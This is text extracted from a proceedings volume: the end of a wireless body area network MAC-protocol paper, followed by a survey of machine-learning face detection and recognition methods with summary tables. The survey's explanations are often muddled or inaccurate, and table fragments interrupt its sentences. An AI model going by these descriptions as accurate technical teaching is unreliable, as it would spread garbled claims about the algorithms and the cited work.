7 Conclusion
In this paper, we have studied the different multiple access techniques of MAC protocols
that are exploited in wireless body area networks. MATLAB simulation is used to compare
CSMA/CA and our proposed model: the number of nodes is compared against the average
delay. The simulation results show that increasing the number of sensor nodes does not
greatly affect the average delay. In any case, this is not a major problem because, in practical
WBAN applications, the number of sensor devices mounted on the body is relatively small.
References
1. Mahapatro, J., Misra, S., Manjunatha, M., & Islam, N. (2012, Dec). Interference-aware channel
switching for use in WBAN with human-sensor interface. In 2012 4th International Conference
on Intelligent Human Computer Interaction (IHCI) (pp. 1–5). IEEE.
2. Toumanari, A., & Latif, R. (2014, April). Performance analysis of IEEE 802.15.6 and IEEE
802.15.4 for wireless body sensor networks. In 2014 International Conference on Multimedia
Computing and Systems (ICMCS) (pp. 910–915). IEEE.
3. Latré, B., Braem, B., Moerman, I., Blondia, C., & Demeester, P. (2011). A survey on wireless
body area networks. Wireless Networks, 17(1), 1–18.
4. Fang, G., & Dutkiewicz, E. (2009, Sept). BodyMAC: Interference mitigation between WBAN
equipped patients. In ISCIT 2009, 9th International Symposium on Communications and
Information Technology (pp. 1455–1459). IEEE.
5. Liu, B., Yan, Z., & Chen, C. W. (2011, June). CA-MAC: A hybrid context-aware MAC
protocol for wireless body area networks. In 2011 13th IEEE International Conference on
e-Health Networking, Applications and Services (Healthcom) (pp. 213–216). IEEE.
6. Shrestha, B., Hossain, E., & Choi, K. W. (2014). Distributed and centralized hybrid
CSMA/CA-TDMA schemes for single-hop wireless networks. IEEE Transactions on Wireless
Communications, 13(7), 4050–4065.
7. Fang, G., & Dutkiewicz, E. (2009, Sept). BodyMAC: Energy efficient TDMA-based MAC
protocol for wireless body area networks. In ISCIT 2009, 9th International Symposium on
Communications and Information Technology (pp. 1455–1459). IEEE.
8. Alrabea, A., Alzubi, O., & Alzubi, J. (2020). An enhanced MAC protocol design prolong sensor
network lifetime. International Journal on Communication Antenna Propagation, 10.
https://doi.org/10.15866/irecap.v10i1.17467
9. Alrabea, A., Alzubi, O. A., & Alzubi, J. A. (2019). A task-based model for minimizing energy
consumption in WSNs. Energy Systems, 1–18.
10. Bhatia, A., & Patro, R. K. (2014). Emergency handling in MICS based body area network. In 2014
IEEE International Conference on Electronics, Computing and Communication Technologies
(CONECCT) (pp. 1–5). IEEE.
A Survey: Approaches to Facial
Detection and Recognition with Machine
Learning Techniques
1 Introduction
In the present situation, object identification and recognition are complex and daunting
topics in pattern processing, computer vision, neural networks, and machine learning. This
subject is being debated in numerous learning communities,
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 103
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_9
104 P. Singhal et al.
such as the supervised and the unsupervised learning communities. Facial implementations
involve the recognition of 2D facial representations and the creation of different facial
descriptors using various learning strategies. Recent advances in deep learning have given
researchers in artificial intelligence a new method for face detection and recognition. It is a
rapidly growing and very popular technique for face detection and recognition, designed to
address dynamic machine learning problems involving both humans and machines. Deep
learning offers an innovative, technique-based approach to identifying faces for recognition
and verification. In deep learning, the machine learns and performs classification directly on
new videos and pictures; it advances the state of the art and can exceed human accuracy and
efficiency. Deep learning trains on labeled data in neural network architectures involving
several layers in a convolutional neural network. The hidden layers serve as a bridge
between the input and output layers, and operate on both basic and complicated types of
pictures. Identification and authentication problems are solved using the full number of
hidden layers. Deep learning theory was first introduced in the 1980s. For the following
reasons, it has become a powerful concept for feature extraction in face detection and recognition.
It embodies the best machine learning principles and has been used in pattern recognition,
computer vision, and machine learning. The convolutional neural network is the best
method for evaluating past information or evidence to solve a new problem. It relies on
transforming the input image into the output image through several hidden layers, and it is
closely related to machine learning and pattern analysis. In 1980, Kunihiko Fukushima
suggested the use of neural network architecture to address the image recognition problem.
Studies have been performed on geometric patterns used in image processing for facial
identification and recognition. Researchers focus on the problem of image and video
recognition and authentication and have many ideas for solving facial identification and
recognition. In a deep learning approach, the term "deep" refers to the number of hidden
layers in the network: generally there are two or three layers, but deep networks may
examine hundreds of layers. Because deep learning focuses on facial identification and
recognition, higher accuracy has been achieved. Deep learning operates somewhat like a
robot and requires artificial intelligence; its functionality is learned with the aid of feature
extraction, in which the features are derived from the hidden layers.
Figure 1 demonstrates the convolutional neural network architecture based on the
interaction between input, output, and hidden layers. The architecture organizes a collection
of interconnected nodes into layers; the intermediate layers are known as hidden layers. The
characteristics of the input images
Fig. 1 Architecture of a CNN showing the relationship between input, output, and hidden layers
are classified and compared with the stored images. The hidden layer holds the highest
number of layers in applications and identifies the different attributes of basic and complex
pictures in the datasets. Figure 1 represents the model architecture of the convolutional
neural network as a combination of the input, hidden, and output layers. These layers are the
most important components of the network, since they interpret all the features of the input
images, label them in the hidden layers according to their characteristics, and organize the
output for the input images. The approach has been used with large amounts of labeled data
in datasets, learning the relevant sequence of features directly from the data without manual
feature extraction. A deep neural network is a stack of nonlinear computation layers used in
machine learning and pattern analysis, interconnecting several layers: the input layer for
input data, the hidden layers for features, and the output layer for the object. Deep learning
addresses the problem of faces in real-time photographs and databases, starting from
captured photos and normalizing them for the network. Deep learning draws on the broadest
range of technologies to enhance the efficiency of facial identification and recognition; it
solves face-related problems using convolutional neural network architectures and brings
new ideas and definitions to face-related problems in the real-time world.
AlexNet, developed in 2012 by Alex Krizhevsky, Ilya Sutskever, and Geoffrey Hinton, is a
very popular and simple model for researchers solving the problem of face detection and
recognition. It has a simple architecture merging convolutional layers with max pooling
layers: the deep neural network mixes convolutional layers, multiple pooling layers, and
fully connected layers. The network gathers a great deal of information from the data and
stores it across the various hidden layers, which act as subdivisions of the input object. The
deep neural network in Fig. 2 takes an input image and detects or categorizes an entity,
classifying entities to produce useful outputs. In Fig. 2, the input image is a test image for
the network model; after gathering the training data, the network model starts to recognize
the basic features of the object and correlates the image with the corresponding categories.
In this deep convolutional network, each layer takes data or an image from the previous
layers and passes it to the next layers, increasing the precision and consistency of the image
data from layer to layer. The deep convolutional neural network operates through several
kinds of layers. The convolution layer processes the input image through a sequence of
neural transformations, and this forward pass learns the characteristics of the pictures. The
pooling layer simplifies the output by performing a nonlinear down-sampling, reducing the
number of measurements used for the features of the images.
The fully connected layer plays its part in the identification of the object. After the detection
stage of the deep convolutional network is complete, processing moves to the fully
connected layers: the last layers in the deep convolutional neural network, which classify
and define the categories of the entity. The output is a k-dimensional vector, where k is the
number of classes; this vector contains the probability of each class to be identified for each image.
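The convolution, pooling, and k-dimensional probability vector described above can be sketched in miniature; the 4 × 4 image and the edge kernel below are invented for illustration, and a real CNN would learn its kernels rather than hand-pick them:

```python
import math

def conv2d_valid(image, kernel):
    """2-D valid convolution (cross-correlation, as in most CNN layers)."""
    kh, kw = len(kernel), len(kernel[0])
    out_h, out_w = len(image) - kh + 1, len(image[0]) - kw + 1
    return [[sum(image[i + di][j + dj] * kernel[di][dj]
                 for di in range(kh) for dj in range(kw))
             for j in range(out_w)] for i in range(out_h)]

def max_pool2x2(fmap):
    """Non-overlapping 2x2 max pooling: the nonlinear down-sampling step."""
    return [[max(fmap[i][j], fmap[i][j + 1], fmap[i + 1][j], fmap[i + 1][j + 1])
             for j in range(0, len(fmap[0]) - 1, 2)]
            for i in range(0, len(fmap) - 1, 2)]

def softmax(scores):
    """Turn the final k-dimensional score vector into class probabilities."""
    exps = [math.exp(s) for s in scores]
    total = sum(exps)
    return [e / total for e in exps]

image = [[1, 0, 2, 1], [0, 1, 3, 0], [1, 2, 0, 1], [0, 1, 1, 2]]
edge = [[1, -1], [1, -1]]              # hand-picked vertical-edge kernel
features = max_pool2x2(conv2d_valid(image, edge))
```

In a full network, the pooled feature maps would be flattened and passed through fully connected layers before the softmax.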
This is the most common deep learning algorithm, operating on facial features in machine
learning. It succeeds in defining the characteristics of the input layers without manual
feature extraction, though it requires time to transfer the information; the features of the
databases are resolved and categorized. Figure 3 displays the architecture of the
feed-forward network model, containing both weight and bias elements. It has a three-layer
structure, as in several neural networks. The hidden layers shown in Fig. 3 are identified in
this model as h, with the output layer and bias denoted voi; the biases are applied to the
network model as weights whose input value is always 1. The figure shows the output
layers summing and transforming the data. Three layers appear in the feed-forward network
architecture of Fig. 3: the input layers x1–xn are connected to the hidden layers h1–hn,
which in turn are connected to the output layers y1–yn, all interconnected through weights
and biases in the network model. Computational complexity depends on the number of
hidden layers; with them, network models achieve high fidelity, and the bias
is more efficient when dealing with the input and output layers.
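A minimal sketch of the three-layer feed-forward pass with weights and biases, assuming sigmoid activations (the source does not specify the activation) and invented weight values:

```python
import math

def dense(inputs, weights, biases):
    """One fully connected layer: weighted sum plus bias, sigmoid activation."""
    return [1.0 / (1.0 + math.exp(-(sum(w * x for w, x in zip(row, inputs)) + b)))
            for row, b in zip(weights, biases)]

def feed_forward(x, w_hidden, b_hidden, w_out, b_out):
    """Input layer -> hidden layer h -> output layer, as in Fig. 3."""
    h = dense(x, w_hidden, b_hidden)
    return dense(h, w_out, b_out)

# Hypothetical 2-input, 2-hidden, 1-output network with hand-picked weights.
y = feed_forward([1.0, 0.0],
                 w_hidden=[[0.5, -0.5], [0.25, 0.75]], b_hidden=[0.0, 0.0],
                 w_out=[[1.0, -1.0]], b_out=[0.0])
```

The bias terms behave exactly as the text describes: extra weights whose input is fixed at 1.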
It transmits a nonlinear model using a limited number of layers, working on faces and their
machine learning applications. This network delegates several hidden layers to the different
face features used; these layers consist of neurons or nodes. The DCNN interprets the set of
objects and, after processing, immediately matches the face of the object to the
corresponding input images. The labeled data in a DCNN serves as training data in the
datasets and has been used to recognize images and place their attributes in specific groups
of the datasets. The DCNN passes the previous data to the feature set in the next layers of
the architecture, increasing consistency and precision as the processing moves from layer to layer.
The KNN algorithm is one of the better algorithms for matching the features of the closest
neighbors or nodes. It is also known as a lazy algorithm, and k is the number of neighbors
considered. The algorithm is easy to understand and implement. The k-nearest neighbor
algorithm is based on the features of the closest entity nodes, but it is a non-parametric
algorithm: the word non-parametric means it requires no assumptions about the underlying
distribution of the data. It effectively memorizes the training data, so the full functional data
does not fall within the traditional theoretical analysis of function learning. The KNN
algorithm chooses the closest points in the feature space of the database; these depend on a
minimum distance, possibly over multi-dimensional vectors, since the feature space carries
a notion of distance. A non-parametric algorithm such as k-nearest neighbor therefore
arrives to solve this problem in the databases.
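A minimal sketch of the lazy, non-parametric k-NN vote described above; the 2-D "face"/"non-face" feature points here are invented for illustration:

```python
import math
from collections import Counter

def knn_predict(train, query, k=3):
    """Classify `query` by majority vote among its k nearest training points.

    `train` is a list of (feature_vector, label) pairs; no model is fit in
    advance, which is why k-NN is called a lazy, non-parametric method.
    """
    neighbours = sorted(train, key=lambda item: math.dist(item[0], query))[:k]
    votes = Counter(label for _, label in neighbours)
    return votes.most_common(1)[0][0]

# Hypothetical 2-D feature points standing in for face descriptors.
faces = [((0.1, 0.2), "face"), ((0.2, 0.1), "face"),
         ((0.9, 0.8), "non-face"), ((0.8, 0.9), "non-face")]
label = knn_predict(faces, (0.15, 0.15), k=3)
```

All distance computation happens at query time, which is the practical cost of the method's laziness on large face databases.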
The support vector machine (SVM) is a very efficient and effective classifier used in machine learning. In SVM classifiers for face detection and recognition, the distance between the data points and the decision surface must be maximized: the classifier selects the points nearest to the decision surface and measures their distance from it. These closest points are known as the support vector points, and their use is what gives the support vector machine its name. The SVM maximizes the margin, the width between the decision surface and the nearest points on either side, and compares characteristics from one point to another. Once this process has been completed, the faces in the databases can be recognized.
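The geometry described above (distance to the decision surface, margin set by the closest points) can be made concrete. The sketch below assumes a hypothetical, already-trained 2-D hyperplane w·x + b = 0; it illustrates the margin computation only, not the SVM training algorithm itself:

```python
# Illustrative sketch of SVM geometry (2-D, hypothetical hyperplane):
# the distance from point x to the surface w.x + b = 0 is |w.x + b| / ||w||,
# and the margin is twice the distance of the closest (support vector) points.
from math import hypot

def distance_to_surface(w, b, x):
    """Perpendicular distance from point x to the hyperplane w.x + b = 0."""
    return abs(w[0] * x[0] + w[1] * x[1] + b) / hypot(w[0], w[1])

# Hypothetical trained hyperplane separating two face classes.
w, b = (1.0, 1.0), -3.0
points = [(1.0, 1.0), (0.0, 1.0), (3.0, 2.0), (4.0, 3.0)]
dists = [distance_to_surface(w, b, p) for p in points]
margin = 2 * min(dists)  # the support vectors are the closest points
print(min(dists), margin)
```

Training an SVM amounts to choosing w and b so that this margin is as large as possible while the classes stay on opposite sides of the surface.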
A Survey: Approaches to Facial Detection and Recognition … 109
Principal component analysis (PCA) is one of the most common and oldest techniques for image processing and pattern analysis. It was developed by Pearson (1901) and improved by Hotelling (1933). It works on the eigenvalues and eigenvectors of a matrix using the matrix method and has been applied in a wide variety of applications. By definition, PCA reduces the dimensionality of the database; it is capable of handling a huge range of datasets, and its capabilities extend to the remaining databases available in the scheme.
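The eigenvalue/eigenvector computation PCA rests on can be sketched directly. This is an illustrative NumPy example on made-up 3-D "feature" vectors, not code from the surveyed work: center the samples, form the covariance matrix, and project onto its top eigenvectors:

```python
# Illustrative PCA sketch: project centered samples onto the top
# eigenvectors of their covariance matrix. Data is hypothetical.
import numpy as np

def pca(X, n_components):
    """Reduce X (samples x features) to n_components dimensions."""
    Xc = X - X.mean(axis=0)                   # center the data
    cov = np.cov(Xc, rowvar=False)            # feature covariance matrix
    eigvals, eigvecs = np.linalg.eigh(cov)    # eigh returns ascending order
    top = eigvecs[:, ::-1][:, :n_components]  # largest-variance directions
    return Xc @ top

# Hypothetical 3-D feature vectors reduced to a single dimension.
X = np.array([[2.0, 0.0, 1.0],
              [4.0, 2.0, 3.0],
              [6.0, 4.0, 5.0]])
Z = pca(X, 1)
print(Z.shape)  # (3, 1)
```

Here the three samples lie on a line, so a single principal component captures all of their variance, which is exactly the dimensionality reduction the text describes.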
3 Feature Extraction
Feature extraction is a very common method for extracting features from images for facial identification and recognition. It is widely used in fields such as optical image recognition, pattern detection, machine vision, and deep learning. The input images are converted into pixels, and these pixel values are turned into a combination of features stored in a database, since the chosen features carry the most relevant information in the original data. Feature extraction is also useful for biometric applications and machine learning.
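The pixel-to-feature step described above can be sketched minimally. The example below assumes a tiny grayscale patch (invented values) and simply flattens and normalizes it into a feature vector a classifier or database could store; real pipelines would follow this with descriptors such as the holistic projections discussed next:

```python
# Minimal illustrative sketch of the pixel-to-feature step: flatten a
# small grayscale image into a normalized feature vector. Hypothetical data.
def to_feature_vector(image, max_value=255):
    """Flatten a 2-D grayscale image row by row and scale pixels to [0, 1]."""
    return [pixel / max_value for row in image for pixel in row]

face_patch = [[0, 128],
              [255, 64]]
features = to_feature_vector(face_patch)
print(features)  # four features, one per pixel, scaled to [0, 1]
```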
Holistic feature extraction is among the most effective tools for facial identification and recognition, and it underlies software classification approaches based on facial identification and recognition. Unlike any local extraction process, a holistic method draws on the image as a whole as its source of data, eliminating the usual processing that derives broad data from images in the database. Holistic feature extraction transforms the image into a low-dimensional feature space that increases the discriminant capacity of the images.
Table 1 provides an overview of machine learning for facial detection and identification in images and in videos. It shows facial identification and recognition approaches using different strategies and datasets, together with their accuracy, and further illustrates the merits and demerits of each approach; the various authors use their own image definitions for the datasets that have been shown to be related. The table lists the distinct strategies and approaches that various researchers have used to obtain the best facial identification and recognition results, and the methods used in facial detection and identification are classified. The table description provides a full overview of the approaches that address the problems of faces in various settings and that attempt to solve the new face detection and identification issues found in the existing scenario (Table 2).
Face detection and recognition applications operate on 2D face images. They need a large number of feature matches across different techniques. Using learning applications, they have improved the accuracy of face images in datasets. The impact of pose, illumination, and expression provides the basic and complete information
Table 1 (continued)
Year Description
Xuanyi Dong et al. (2018) suggested multi-modal self-paced learning for detection (MSPLD) and few-example object detection (FEOD) for face detection and recognition. These models use a large pool of unlabeled images and only a few labeled images per group, with various detection frameworks for discriminant information. The approach provides stronger performance on the PASCAL-VOC2007, PASCAL-VOC2012, MSCOCO2014, ILSVRC2013, and ImageNet-COCO datasets [9]
Mehdi Mafi et al. (2018) introduced a switching-based adaptive median and fixed weighted mean filter (SAMFWMF) for facial detection and recognition. Edge detection and sharpening are regulated by SAMFWMF on the Lena (512 × 512), Cameraman (250 × 250), Coins (300 × 246), and Checkerboard (256 × 256) pictures. SAMFWMF achieves better structural metrics, and the best results are obtained in combination with another traditional thresholding tool to detect faces and then identify them [10]
Dapeng Tao et al. (2018) suggested the tensor rank preserving discriminant analysis (TRPDA) technique to solve the issue of facial identification and recognition. They achieved robust results and high recognition rates on the UMIST, ORL, and CAS-PEAL-R1 datasets. TRPDA extracts features through its rank module and exclusion function, offering a flexible way of studying the face for identification and recognition [11]
Wei Wang et al. (2018) introduced recurrent face aging (RFA) with an RNN for facial detection and identification. RFA reached 65.43% accuracy while the bi-layer model reached 61%, indicating that RFA performs marginally better than the bi-layer RNN. The authors use the LFW and CACD datasets to enhance face detection and recognition performance. The RFA system consists of a triple-layer GRU, providing better identity information than the bi-layer GRU for facial detection and recognition [12]
Seunghwa Jeong et al. (2018) used Markov random field energy modeling. In particular, this approach operates in a wide-baseline multi-view system. The segmentation approach increased efficiency with comparable consistency and was built on the latest state-of-the-art design. They also collected features under different critical conditions, covering the full range of rotations, views, and distances between the capturing cameras; a sparse wide baseline is handled quite efficiently [13]
Christos Sagonas et al. (2018) suggested joint and individual variation explained (JIVE) and robust-JIVE (RJIVE) for facial identification and recognition. They increased accuracy across the years, and details on the faces remaining in the RJIVE-based progression of the FG-NET datasets were also defined. Accuracy depends on the age difference between the pair of photographs compared [14]
Xiangyu Zhu et al. (2018) built on 3D dense face alignment (3DDFA) and the 3D Morphable Model (3DMM) for facial identification and recognition. Face alignment covered the entire pose spectrum, handling variance in face orientation on the ALFW, AFW, LFPW, HELEN, IBUG, 300W, and AFLW2000-3D datasets. Comparing the outputs, the performance drop is attributed to extreme boundary poses. The approach shows the highest robustness of 3DDFA initialization in face identification and recognition [15]
Mei Wang et al. (2018) adapted the approach to a variety of different strategies used in the identification and recognition of the face [16]
Changxing Ding et al. (2018) suggested the controlled face feature (CPF) method for facial identification and recognition. Using CPF in large-scale studies reveals dominance in both learning representation and rotating non-frontal images. The face recognition experiment on the MultiPIE database offers further evidence of the role of intensity in particular methods [17]
C. Fabian Benitez-Quiroz et al. (2018) introduced a facial action device for the identification and recognition of the face, developed to address the recognition issue using robust machine vision algorithms. The DISFA and AM-FED datasets are used for color features, and this color can also be used to identify the triggering of an action unit [18]
Cristóvão Cruz et al. (2018) suggested single image super resolution (SISR) with a CNN for facial identification and recognition. 1D Wiener filtering operates on resemblance domains and gives an appropriate solution to the particular SISR issue. The results are sharper reconstructions on the Set5, Set14, and urban datasets, but the approach works well only on pictures with significant self-similarity [19]
2017 Xiaolong Wang et al. (2017) suggested a cross-age face authentication algorithm for facial detection and recognition problems. They also focused on a successful compromise between feature sharing and feature exclusion [20]
Chi Nhan Duong et al. (2017) suggested temporal non-volume preserving (TNVP) transformations and a generative adversarial network (GAN) for facial identification and recognition using the FG-NET, MORPH, CACD, and AGFW datasets. TNVP accurately measured both the synthesis of age-progressed faces and cross-age face verification. TNVP guarantees an appealing density property; the authors collected feature information and inferred the importance of successive phases of the face when evaluating the embedded datasets [21]
Ran He et al. (2017) suggested visual versus near-infrared (VIS–NIR) matching with an invariant deep representation (IDR) using the CASIA NIR-VIS2.0 and large-scale VIS datasets for facial identification and recognition. On large-scale VIS data they achieve a 94% verification rate compared with the state of the art, and they lower the error rate by 58% with only a lightweight 64D representation [22]
Lanquering Hu et al. (2017) suggested a learning displacement field network (LDF-NET) for facial identification and recognition using the MultiPIE datasets. It operates on the frontal view, which offers insightful information from the datasets. LDF-NET achieved increased facial identification and recognition efficiency around the face [23]
Christian Galea et al. (2017) focused on the deep convolutional neural network (DCNN) approach to facial detection and identification using VGG-Face, PRIP-HDC, MEDS II, FRGC v2.0, and MultiPIE. The error rate was lowered from 80.7 to 32.5% by the use of real-world forensic sketches. A Morphable Model was used to alter faces based on facial features and automatically produce close images [24]
Rajeev Ranjan et al. (2017) suggested a single deep convolutional neural network (SDCNN) with multi-task learning (MTL) for face detection and recognition. The findings demonstrate the networks' perception of faces and the improvements obtained on the Celeb-A, IMDB + WIKI, and PASCAL datasets. The approach substantially strengthens the HyperFace structure through MTL [25]
114 P. Singhal et al.
2016 Yadong Guo et al. (2016) used the MS-Celeb-1M, YFW, FG-NET, CASIA, Facebook, and Google benchmark facial identification and recognition tasks. The training range includes approximately 75% of the celebrities. Face identification requires human actions in the processing of pictures. The benchmark method works on very large datasets, and classification methods were used to solve the face issue in actual applications [26]
Wen-Sheng et al. (2016) suggested automated facial action unit (AU) detection with a selective transfer machine (STM) for facial identification and recognition using the CK+, GEMEPERA, RU-FACS, and GFT datasets. The experimental outcome showed both facial and systemic implications. STM enhances test efficiency by reweighting training samples toward the test samples, and it can be formulated with convex decision and logistic loss expressions [27]
George Trigeorgis et al. (2016) suggested a semi-non-negative matrix factorization algorithm for facial detection and identification, using the CMU-PIE and XM2VTS databases for facial identification and recognition. They worked on two-dimensional models to understand expressions; both clustering and classification problems were solved by these algorithms, which provide different attribute information to communicate with different data sources [28]
Iacopo Masi et al. (2016) suggested pose-aware models (PAM) using the IARPA, LFW, CASIA, YTF, IJB-A, and PIPA datasets to solve the issue of facial identification and recognition. These models provide a solution at the optimization stage and mitigate the lack of regularization; all model-selection functions operate on pipeline recognition models [29]
Zhifeng Li et al. (2016) developed a system based on hierarchical features, working on two levels of learning with local pattern selection (LPS). The result was higher than 94.20% on separate datasets such as MORPH, FG-NET, and Album2, with the clearest results obtained on the MORPH and Album2 datasets. The performance offered is significantly limited to the faces [30]
Mustafa Mehdipur Ghazi et al. (2016) combined a CNN with VGG systems to boost the performance of facial identification and recognition, applied in deep learning models. They offered effective expression and presentation in the identification and recognition of the face, focused on a holistic, representation-based appraisal, and obtained better outcomes under varying conditions [31]
Ju Yong Chang (2016) suggested a gesture identification system, named the structural support vector machine (SSVM) with a conditional random field (CRF), for facial identification and recognition. They developed an efficient gesture recognition tool for use on actual gesture datasets; the CRF model uses non-parametric and varied functions. Working on the learning system supporting the SSVM application, the LAP and MSRC-12 datasets were used [32]
Bastian Wandt et al. (2016) suggested priorly trained base poses and predefined skeletal anthropometric constraints for facial identification and recognition. The 3D architecture reconstructs human motion from a monocular picture series; the model uses periodic functions for the weights of the base poses and gives efficient, stable results on periodic motion. The suggested system uses data from the KTH datasets as well as an outdoor obstacle-jump sequence [33]
Pan Zhou et al. (2016) introduced the latent low-rank representation (LatLRR) with PCA for facial identification and recognition. The suggested approach obtains better classification outcomes than other representation-based paradigms and state-of-the-art identification methods, even with a simplified linear grouping, on a huge collection of datasets (YALEB, AR, Pe, and UCFF-50) by implementing L1-filtering algorithms. The approach is also much better in compression than any other system [34]
Chunlei Peng et al. (2016) suggested a multiple-representation technique for face sketch photo synthesis (MrFSPS) with a Markov model for face detection and recognition. The process improves on current synthesis processes: improved face recognition findings boost the image accuracy on the CUHK, FERET, IIT-D, FG-NET, and LFW datasets. These datasets are based on various synthesis technique models and have been used to synthesize facial recognition technologies with positive results [35]
Chao Dong et al. (2016) introduced a single image super resolution deep CNN (SRCNN) for facial identification and recognition. SRCNN focuses on the end-to-end mapping between low- and high-resolution images, and the output is optimized using pre-processing and post-processing techniques [36]
2015 Jiwen Lu et al. (2015) suggested a compact binary face descriptor (CBFD), pixel difference vectors (PDVs), and a coupled CBFD (C-CBFD) program for facial identification and recognition. CBFD minimized the modality gap for heterogeneous face matching on the FERET, CAS-PEAL, LFW, PASC, and CASIA NIR-VIS2.0 databases. Successful outcomes in object recognition and face detection give further proof of the usefulness of the features [37]
Huazhu Fu et al. (2015) suggested a multi-state selection graph (MSG) system for face identification and recognition. It has an indicator function for the proper treatment of cases and finds the missing item in some popular videos. MSG developed a shared context system to enhance the outcome, which helps solve the problem of extending the regular graph in the images. It works on several state collections of features in pictures and facilitates optimization at the current energy-minimization level [38]
Changxing Ding et al. (2015) introduced multitask feature transformation learning (MTFTL) and patch-based partial representation (PBPR) for face detection and recognition, operating on the training pictures of the FERET, CMU-PIE, MultiPIE, and LFW databases. The new solution improves substantially on the current system. This strategy addresses the authentication and recognition issues of unconstrained faces, and optimal results were found using the LFW datasets [39]
2014 Javier Galbally et al. (2014) suggested a technological approach to the issue of fake photos in the identification and recognition of the face. It works reliably on high-level characteristics for various forms of biometric attacks. The authors also opened new possibilities for the future in this article, including the assessment, inclusion, and use of video quality measures [40]
Zhen Lei et al. (2014) proposed a Gabor and local binary pattern-based discriminant face descriptor (DFD) and coupled DFD (CDFD) for facial identification and recognition. The coupled image feature distance between heterogeneous faces in the photographs is minimized using filters. DFD was tested and provides improved performance on all small datasets such as FERET, LFW, CAS-PEAL-R1, and HFB; it generates positive generalization and offers a competitive descriptor for face recognition under different conditions [41]
2013 Yizhe Zhang et al. (2013) introduced a high-level feature learning system for facial identification and recognition. These approaches solve the many-to-one dilemma of high-level face feature learning, extracting pose-invariant and even unequal identity characteristics from the CMU and MultiPIE databases [42]
Shuiwang Ji et al. (2013) used a CNN and 3DCNN for the identification and recognition of the face. 3D convolutions provide improved efficiency in extracting spatial and temporal information: motion information encoded across several neighboring frames is captured, and experiments were performed on the KTH and TRECVID databases. The 3DCNN model is superior on the TRECVID data form and remains competitive on the KTH databases [43]
about the face images. Face identification and authentication of unknown individuals are very critical tasks. A moving target is a very difficult subject in face recognition, which also faces the further challenges of the subject's aging and non-rigid motion. Learning discriminative appearances in face representation is based on pose-invariant face recognition. Face detection is a big concern in facial recognition systems: the challenge is recognizing the various ways poses change in a scene, while the system contrasts the information of the probe face image with the images of the enrolled faces.
3D face detection and recognition algorithms work well under pose variation, expression, and lighting changes, including low-light images. In a transparent and unregulated setting, the contrast of these variables raises illumination and expression issues. Pre-processing is the fundamental and essential stage in image processing, and post-processing is used to manipulate the resulting images; post-processing techniques extract the characteristics present in the face, such as skin color, eye color, nose height, and related attributes. In feature-extraction learning, various methods are used to quantify the features in artifacts of face detection and recognition.
In face identification and recognition, a guided encoder employs mutual random faces (RFs) to match the facial appearances between the test faces and the enrolled faces [1]. The random function fits the face patterns used in the database.
The attributes of the faces, and the degree to which they conform, are handled and investigated through discriminative identification functions such as size, skin tone, and pose. A typical analysis of feature alignment is to cover the facial features across numerous positions with either deterministic or nonlinear deterministic transferable expressions. In the typical setting, face recognition sees the same pose, lighting, and extracted values, but the names are different. It means they have
Table 2 (continued)
Technique Result Merit Demerit
Technique: Switching adaptive median and fixed weighted mean filter (SAMFWMF) [10]. Result: Edge similarity is preserved using median filters, with better sharpness and smoothness of edges. Merit: SAMFWMF achieves better structural metrics and good contrast results with a common thresholding method. Demerit: The better results are limited to high-intensity impulse noise with edges.
Technique: Tensor rank preserving discriminant analysis (TRPDA) [11]. Result: TRPDA provides the highest recognition rates and better performance. Merit: Features are extracted with the rank module, improving on unstable manifold learning methods. Demerit: Works only on second-order tensors (rows and columns).
Technique: Recurrent face aging (RFA), RNN [12]. Result: Accuracy shows that RFA works better than the RNN, at 65.43% versus 61.00%. Merit: The triple-layer GRU of the RFA framework gives better identity information than the bi-layer GRU. Demerit: The RFA framework does not integrate age estimation.
Technique: Markov random field energy optimization [13]. Result: The method is based especially on a wide-baseline multi-view environment. Merit: Images are captured under various conditions; the system works smoothly and efficiently. Demerit: The system is sensitive to camera parameters.
Technique: Joint and individual variance explained (JIVE), robust-JIVE (RJIVE) [14]. Result: Improved accuracy and validated identity information. Merit: Accuracy improves when the differences within each pair are maximal. Demerit: Age progression in invariant faces makes differences between faces more difficult to detect.
Technique: 3D dense face alignment (3DDFA) and 3D Morphable Model (3DMM) [15]. Result: Face alignment works over the full pose range with the 3D Morphable Model. Merit: The method replaces bounding boxes using 3DDFA. Demerit: Produces large artifacts and invisible-region filling.
Technique: Controlled face feature (CPF) [16, 17]. Result: Superiority in both learning representation and rotating non-frontal images. Merit: The face recognition experiment on the MultiPIE database provides more evidence and strength. Demerit: The auxiliary subtask, trained in an unsupervised way, is applied universally to all datasets.
registered the same images under different identities, so determining the true identity of an image is a major challenge. The learning function in this scenario plays a significant role in determining the true identity of the pictures. In this paper, we present the latest literature on face-specific problems and their solutions, and we try to express the best solutions to face-related problems.
Technique: Facial action units (AUs) [18]. Result: Identification of AUs using color features in datasets. Merit: A color model is used for detecting AU activation. Demerit: Poor efficiency with respect to skin color.
Technique: Single image super resolution (SISR), CNN [19]. Result: SISR gives good results in similar domains using 1D Wiener filtering. Merit: Better results on self-similar objects and images. Demerit: Does not rely on trained input.
Technique: Cross-age face verification [20]. Result: Performance improved from 2.2% EER on MORPH and 7.8% EER on FG-NET by more than 50% and 59.7%. Merit: Effectively balances feature sharing and feature exclusion between the two tasks. Demerit: Poorer results on small datasets and also across a large number of datasets.
Technique: Temporal non-volume preserving (TNVP), generative adversarial networks (GAN) [21]. Result: Works consecutively on synthesizing age-progressed faces and on cross-age face verification. Merit: Guaranteed inference and evaluation of features in consecutive stages. Demerit: The method struggles to solve large-scale problems.
Technique: Visual versus near-infrared (VIS–NIR), invariant deep representation (IDR) [22]. Result: Achieves a 94% verification rate on large-scale VIS data. Merit: Good results; reduces the error rate by 58% with only a compact 64D representation. Demerit: IDR obtains almost the lowest performance among the three implementations.
Technique: Learning displacement field network (LDF-NET) [23]. Result: Achieved frontal images using useful information in the original images. Merit: Good face recognition using the MultiPIE datasets. Demerit: Efficiency is only slightly better than 2D methods.
Technique: Deep convolutional neural network (DCNN) [24]. Result: Reduced the error rate from 80.7 to 32.5% on real-world forensic images. Merit: A face image is recognized through a 3D Morphable Model to improve facial features in new images. Demerit: The algorithm relies primarily on the limited number of sketch images available.
Technique: Single deep convolutional neural network (SDCNN), multi-task learning framework (MTL) [25]. Result: The model offers a better understanding of faces and achieved good results for most tasks. Merit: Performs better than HyperFace using MTL frameworks. Demerit: FDDB fails to capture small faces in any region of the proposal.
